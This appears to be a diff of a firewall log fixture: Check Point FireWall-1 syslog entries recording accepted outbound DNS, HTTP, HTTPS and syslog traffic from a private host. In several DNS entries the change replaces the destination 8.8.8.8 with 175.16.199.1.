FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56481"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56481"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65390"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43437"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48552"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64356"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43438"; xlatesrc:"0.0.0.0"] 
@@ -865,7 +865,7 @@ <134>1 2020-03-29T15:58:57Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c5c1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T16:00:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c608,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47646"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:00:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:00:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58997"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T16:00:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58997"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58370"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10160"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53053"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65458"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43441"; xlatesrc:"0.0.0.0"] 
@@ -873,7 +873,7 @@ <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51974"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10161"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:02:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c686,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53215"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:02:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c688,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61509"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61509"; 
service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58408"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10162"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54035"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64460"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43442"; xlatesrc:"0.0.0.0"] 
@@ -964,7 +964,7 @@ <134>1 2020-03-29T16:05:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c74d,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52142"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43455"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:06:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c77b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64554"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:06:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c77d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; 
service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58554"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10175"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
